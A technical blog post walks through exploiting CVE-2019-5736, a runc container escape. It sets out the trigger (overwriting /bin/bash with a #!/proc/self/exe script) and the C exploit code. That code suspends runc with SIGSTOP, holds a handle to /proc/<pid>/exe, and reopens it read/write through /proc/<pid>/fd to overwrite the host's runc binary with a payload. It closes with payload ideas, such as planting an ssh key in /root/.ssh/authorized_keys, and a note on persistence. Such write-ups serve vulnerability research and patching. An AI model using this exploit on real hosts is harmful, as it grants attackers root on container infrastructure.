Exploiting CVE-2019-5736 to Escalate Privileges

Introduction

A few days ago CVE-2019-5736, a container escape vulnerability in runc, was announced. runc is the container runtime that backs Docker, containerd, Kubernetes, etc. In short, this vulnerability lets attackers get root privileges on the parent host by overwriting the host’s copy of the runc binary from within the container. The replacement binary is fully attacker controlled and runs as root, which is pretty spooky. I’ll do a quick walkthrough of triggering the vulnerability and the exploit I wrote for it. If you want a lower-level, line-by-line walkthrough, you can find one elsewhere.

If you want to skip straight to the exploit code (boo!) you can find it on my GitHub.

Setting up the Environment

I decided to point my efforts at Docker since I’m already familiar with breaking out of its containers. As mentioned in the original email, this is a vulnerability in runc, so you’ll need to make sure that the version of Docker you have installed comes bundled with a vulnerable copy. When I used apt to install an old version of Docker on Ubuntu, I noticed that runc was still the updated copy. To address this I went to the git repo and got a copy of the “latest” release, which (at the time) was 45 commits behind master, meaning it didn’t have the security update. I downloaded the older pre-built binaries and swapped them in for the modern runc binaries on disk. You can find them here. Remember to keep a backup copy of the binary: successful exploitation of this vulnerability means overwriting your runc binary on disk, so things will get messy.

Once you’ve got that set up, pick a container image to work from. I decided to use the default ubuntu:18.04 image. I also mounted a directory shared with my parent host so I could develop the actual exploit there and have it immediately available for use in the container.

docker run -v /shared:/home/ancat/runcbug -i -t ubuntu:18.04 /bin/bash

Prerequisites

Exploiting this bug requires root inside the container, which is the default with Docker and Kubernetes (you should run containers as dedicated unprivileged users where possible!). Like all local privilege escalation exploits, though, you still need some form of remote access first. Generally this means you have one of two things:

  1. You have remote code execution against an application that runs in a container as root
  2. You have control over an arbitrary Docker image loaded by the victim

I’ll cover exploiting this bug in the first scenario.

Exploitation

Triggering the Bug

In the patch, Aleksa Sarai (a runc maintainer) has runc clone /proc/self/exe so that any future references to it do not point to the executable on the parent host’s filesystem. The easiest way to trigger the bug is to replace the entrypoint binary with a reference to /proc/self/exe. From the bug report we know the issue is that this will end up referring to the runc binary used by the parent host, so this is a good start. I did this by replacing /bin/bash with a shell script simply containing #!/proc/self/exe. Now if the parent host were to execute docker exec -it <container_name> bash they would execute the runc binary with two important caveats:

Let’s set up the trigger:

root@7338515f398b:/# echo '#!/proc/self/exe' > /bin/bash

... on the parent host ...

$ docker exec -it 7338515f398b /bin/bash
No help topic for '/bin/bash'

When attempting to execute /bin/bash in the container, the loader now loads /proc/self/exe (which points to the parent’s runc binary) as the script’s interpreter. Essentially, the command being executed is /usr/bin/runc /bin/bash. This will be the process we attack to gain control over the original binary.
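
If you want to watch the interpreter mechanism in isolation, here is a minimal sketch that has nothing to do with runc. It assumes /bin/echo exists and that /tmp allows executing files; the function name shebang_passes_script_path is made up for this illustration. It writes a script containing only #!/bin/echo, executes it, and checks that the kernel really ran "/bin/echo <script path> hello", the same shape as "/usr/bin/runc /bin/bash" above.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical demo helper. Returns 1 if executing a "#!/bin/echo" script made
   the kernel run "/bin/echo <script path> hello", 0 if not, -1 on setup errors. */
int shebang_passes_script_path(void) {
    char path[] = "/tmp/shebang-demo-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    const char line[] = "#!/bin/echo\n";
    if (write(fd, line, sizeof line - 1) < 0 || fchmod(fd, 0700) < 0) {
        close(fd);
        unlink(path);
        return -1;
    }
    close(fd); /* must be closed before exec, or exec fails with ETXTBSY */

    int pipefd[2];
    if (pipe(pipefd) < 0) { unlink(path); return -1; }
    pid_t pid = fork();
    if (pid < 0) {
        close(pipefd[0]);
        close(pipefd[1]);
        unlink(path);
        return -1;
    }
    if (pid == 0) {
        /* Child: send stdout into the pipe, then execute the script itself. */
        dup2(pipefd[1], STDOUT_FILENO);
        close(pipefd[0]);
        close(pipefd[1]);
        execl(path, path, "hello", (char *)NULL);
        _exit(127); /* only reached if exec failed */
    }
    close(pipefd[1]);
    char out[256] = {0};
    ssize_t n = read(pipefd[0], out, sizeof out - 1);
    close(pipefd[0]);
    waitpid(pid, NULL, 0);
    unlink(path);

    /* echo prints its arguments: the script path the kernel inserted, then ours. */
    char expected[256];
    snprintf(expected, sizeof expected, "%s hello\n", path);
    return n > 0 && strcmp(out, expected) == 0;
}
```

The point of the sketch is only that the interpreter named after #! receives the script’s path as an argument, which is why runc complains about /bin/bash as if it were a subcommand.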

Interacting with the runc Process

For the route I took, the first step toward successful exploitation is to suspend the runc process. I did that by polling for runc processes in a tight loop and sending SIGSTOP to the first one I found. This is how my exploit code does it:

printf("waiting for a target runc process...\n");
while (1) {
    target_pid = get_runc_pid();
    if (target_pid != 0) {
        printf("found a runc binary at pid=%d, suspending it so we can mess around\n", target_pid);
        kill(target_pid, SIGSTOP); // stop (signal 19 on x86 Linux)
        break;
    }
}

With this process suspended, you can interact with it from your shell through /proc/ to take a peek inside.

# 48117 is the pid we suspended above
root@7338515f398b:/# ls -l /proc/48117/exe
lrwxrwxrwx 1 root root 0 Feb 13 06:16 /proc/48117/exe -> /usr/bin/runc

root@7338515f398b:/# /proc/48117/exe
NAME:
   runc - Open Container Initiative runtime

runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.
<truncated>

root@7338515f398b:/# echo poo > /proc/48117/exe
bash: /proc/48117/exe: Text file busy

ls -l shows us that /proc/<pid>/exe points to /usr/bin/runc. We can execute it and see that it is indeed runc, but we cannot write to it. Contrary to a common misconception, Linux generally does let you write to a file that another process already has open; the one exception is a currently running executable. In fact, the error message Text file busy does not refer to traditional text files but to the text segment of a running binary.
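
A safe way to reproduce the same error is to have a program try to open its own executable for writing. The sketch below is an illustration rather than part of the exploit, and the helper name errno_opening_for_write is an assumption of mine. It opens without O_TRUNC, so nothing is modified even if the open unexpectedly succeeds.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical demo helper: tries to open path write-only and returns 0 on
   success, or the errno value that open() reported on failure. */
int errno_opening_for_write(const char *path) {
    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        return errno;
    }
    close(fd);
    return 0;
}
```

Calling errno_opening_for_write("/proc/self/exe") from a binary you own should report ETXTBSY on a typical Linux filesystem, while an ordinary writable file such as /dev/null opens fine.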

Overwriting the Binary on the Host

We just saw we can interact with the runc process but couldn’t immediately achieve our goal of replacing the target binary. We can read from it, we can execute it, but we can’t write to it because the process is still running. To address that we can send the process a SIGCONT, resuming the process and ensuring it finishes executing. From my exploit, this is how I did that:

printf("letting the target process complete %d (kill -CONT)\n", target_pid);
if (kill(target_pid, SIGCONT) < 0) { // resume (signal 18 on x86 Linux)
    perror("kill");
    exit(2);
}

However, in between stopping and resuming the target process we need to launch our attack somehow. One of my first exploit attempts involved calling open("/proc/<runc pid>/exe", O_RDONLY); from a different process and then using fcntl to change the access mode to read/write. It went something like the following:

int fd = open("/proc/<runc pid>/exe", O_RDONLY);
int flags = fcntl(fd, F_GETFL);
flags |= O_RDWR;
fcntl(fd, F_SETFL, flags);

Unfortunately, it turns out that the access mode is one of the two kinds of flags (the other being file creation flags such as O_CREAT and O_TRUNC) that fcntl’s F_SETFL will ignore (but not complain about!). So we need a new plan.
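
You can confirm this behaviour with a few lines of C. The sketch below is illustrative only and the helper name accmode_after_setfl is hypothetical: it opens a file read-only, asks F_SETFL for O_RDWR, and reports the access mode the descriptor actually ends up with.

```c
#include <fcntl.h>
#include <unistd.h>

/* Hypothetical demo helper. Opens path read-only, tries to upgrade the
   descriptor to O_RDWR via F_SETFL, and returns the resulting access mode
   (O_RDONLY, O_WRONLY or O_RDWR), or -1 if any call failed. */
int accmode_after_setfl(const char *path) {
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;

    int before = fcntl(fd, F_GETFL);
    /* This call reports success even though the access mode bits are ignored. */
    int rc = fcntl(fd, F_SETFL, before | O_RDWR);
    int after = fcntl(fd, F_GETFL);
    close(fd);

    if (before < 0 || rc < 0 || after < 0) return -1;
    return after & O_ACCMODE;
}
```

For any readable file the result should still be O_RDONLY, which is exactly why this approach was a dead end.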

My next approach involved playing with /proc/<pid>/fd/, which lets you interact with another process’ file descriptors. On Linux, you can take a look at another process’ open file descriptors by looking at its fd directory in the /proc/ filesystem. If you’ve ever used lsof, this is what it uses to show you all your open files. For example, a vim server.c process may have entries like the following:

$ ls -lah /proc/28034/fd/
total 0
dr-x------ 2 gremlin gremlin  0 Feb 17 02:25 .
dr-xr-xr-x 9 gremlin gremlin  0 Feb  5 02:55 ..
lrwx------ 1 gremlin gremlin 64 Feb 17 02:26 0 -> /dev/pts/33
lrwx------ 1 gremlin gremlin 64 Feb 17 02:26 1 -> /dev/pts/33
lrwx------ 1 gremlin gremlin 64 Feb 17 02:25 2 -> /dev/pts/33
lrwx------ 1 gremlin gremlin 64 Feb 17 02:26 4 -> /home/gremlin/.server.c.swp

The first three file descriptors (stdin, stdout and stderr) point at my terminal, and the fourth entry is vim’s swap file. The interesting part about accessing file descriptors this way is that while their access modes can’t directly be changed (e.g. via fcntl or otherwise), they can be reopened in a different access mode and still point at the same inode. That’s the exact strategy we’re going to use.
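
Here is the reopening trick on a throwaway temp file, as a minimal sketch rather than the exploit itself. The function name reopen_readonly_fd_for_writing is made up, and the sketch assumes /proc is mounted and /tmp is writable. It also deletes the file’s name before reopening, to show that the path going away does not matter as long as a handle to the inode is still held.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical demo helper. Returns 1 if data written through a read/write
   reopen of /proc/self/fd/<n> is visible through the original read-only
   descriptor, 0 if not, -1 on setup errors. */
int reopen_readonly_fd_for_writing(void) {
    char path[] = "/tmp/reopen-demo-XXXXXX";
    int tmp = mkstemp(path);
    if (tmp < 0) return -1;
    close(tmp);

    /* The only handle we keep is read-only. */
    int ro = open(path, O_RDONLY);
    if (ro < 0) { unlink(path); return -1; }
    unlink(path); /* the name is gone, but the inode lives while ro is open */

    /* Reopen the same inode through procfs, this time read/write. */
    char link[64];
    snprintf(link, sizeof link, "/proc/self/fd/%d", ro);
    int rw = open(link, O_RDWR);
    if (rw < 0) { close(ro); return -1; }

    const char msg[] = "replaced";
    ssize_t written = write(rw, msg, sizeof msg - 1);
    close(rw);

    /* Read the contents back through the original read-only descriptor. */
    char buf[16] = {0};
    ssize_t got = pread(ro, buf, sizeof buf - 1, 0);
    close(ro);

    return written == (ssize_t)(sizeof msg - 1) && got == written &&
           memcmp(buf, msg, (size_t)written) == 0;
}
```

The reopen is a fresh open() against the inode, so the usual permission checks still apply; it works here because we own the temp file, and it works in the exploit because the container process is root.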

To put it all together, here’s the rest of the exploit:

printf("waiting for a target runc process...\n");
while (1) {
    target_pid = get_runc_pid();
    if (target_pid != 0) {
        printf("found a runc binary at pid=%d, suspending it so we can mess around\n", target_pid);
/*[1]*/ kill(target_pid, SIGSTOP); // stop
        break;
    }
}

// ... truncated ...

char* runc_path;
asprintf(&runc_path, "/proc/%d/exe", target_pid);
printf("runc @ %s\n", runc_path);
/*[2]*/ int exe = open(runc_path, O_RDONLY);

// ... truncated ...

/*[3]*/ if (kill(target_pid, SIGCONT) < 0) { // resume
    perror("kill");
    exit(2);
}
// ... truncated ...

int pid = fork();

if (pid == 0) {
    int parent = getppid();
    char* indirect_exe;
    asprintf(&indirect_exe, "/proc/%d/fd/3", parent);
    printf("opening parent's handle to exe as rw (%s)\n", indirect_exe);
    while(1) {
/*[4]*/ int indirect_fd = open(indirect_exe, O_RDWR | O_TRUNC);
        if (indirect_fd < 0) {
            continue;
        }

        printf("success! %d should be read write\n", indirect_fd);
/*[5]*/ int bytes_out = write(indirect_fd, payload, strlen(payload));
        close(indirect_fd);
        printf("success! replaced the host's runc binary with the payload (%d bytes out)\n", bytes_out);
        break;
    }
}

So at each annotated step, we:

  1. Suspend the runc process so we can take all the time we need.
  2. Open a read only handle to /proc/<runc process>/exe.
  3. Resume the runc process and let it finish so we don’t get the Text file busy error.
  4. Open a read/write handle to /proc/<exploit pid>/fd/3, which refers to the handle we opened in step 2.
  5. Write our payload to disk.

Because the process is finished executing at Step 3, /proc/<runc process>/exe no longer exists. However, we held onto a handle to that same exact inode in Step 2. At Step 4 we open that handle but this time in read/write mode, at which point we can write to that inode and thus replace the contents of the binary on the parent host.

Achieving Code Execution

At this point we’ve successfully replaced the contents of the runc binary on the host system. The next time runc executes (almost any Docker command will do) our code will run with root privileges. I intentionally glossed over this part in my exploit, but your payload can pretty much do whatever: kill all the containers, drop an ssh key in /root/.ssh/authorized_keys, hotfix the vulnerability, etc. For a “production grade” exploit you would probably want to restore the runc binary after achieving persistence, otherwise you’ll probably break Docker.